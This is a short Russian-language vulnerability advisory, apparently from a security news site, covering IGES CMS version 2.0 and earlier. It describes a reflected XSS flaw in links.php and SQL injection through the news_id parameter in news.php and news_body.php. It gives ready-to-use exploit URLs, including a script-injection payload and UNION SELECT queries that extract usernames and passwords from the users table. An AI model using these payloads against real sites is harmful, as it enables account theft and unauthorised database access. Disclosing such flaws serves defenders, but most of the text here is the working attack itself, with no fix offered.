Программа: IGES CMS <= 2.0

Уязвимость позволяет удаленному пользователю осуществить XSS нападение на
целевую систему и выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных сценариями
news.php, news_body.php и links.php. Атакующий может выполнить произвольный
сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Эксплоит:

http://[URL]/links.php?cat=<script>alert(/XSS/.source)</script>

Уязвимость существует из-за недостаточной обработки входных данных в
параметре «news_id» сценариями news.php и news_body.php. Удаленный пользователь
может с помощью специально сформированного запроса выполнить произвольные SQL
команды в базе данных приложения.

Эксплоит:

http://[URL]/news.php?news_id=65 union select
1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12 from users/*
http://[URL]/news_body.php?news_id=65 union select
1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12 from users/*

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии